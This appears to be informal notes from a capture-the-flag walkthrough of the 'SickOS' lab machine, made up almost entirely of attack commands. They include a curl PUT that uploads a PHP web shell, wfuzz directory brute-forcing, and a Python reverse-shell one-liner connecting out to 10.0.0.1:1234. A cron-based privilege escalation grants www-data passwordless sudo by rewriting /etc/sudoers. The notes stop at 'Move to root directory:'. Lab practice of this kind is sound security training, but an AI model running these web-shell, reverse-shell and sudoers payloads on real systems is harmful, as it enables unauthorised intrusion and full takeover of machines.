Sick os
Nmap
https://stackoverflow.com/questions/9120760/curl-simple-file-upload-417-expectation-failed
Reverse shell:
curl -v -X PUT -d ‘<?php system($_GET[“cmd”]); ?>’ http://192.168.1.7/test/shell.php
Wfuzz:
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt — hc 404 -u 192.168.1.7/FUZZ
Oway to browser — à terminal reverse shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Focs on
1.pwd
2.etc
3.tmp
Go and check tmp(nothing interesting)
So go back
Go and check etc
Ls –la /etc/cron*
Used for job schedule
Go to tmp
$ echo ‘chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers’ > /tmp/update
$ cat update
chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers
$ ls -la
Move to root directory: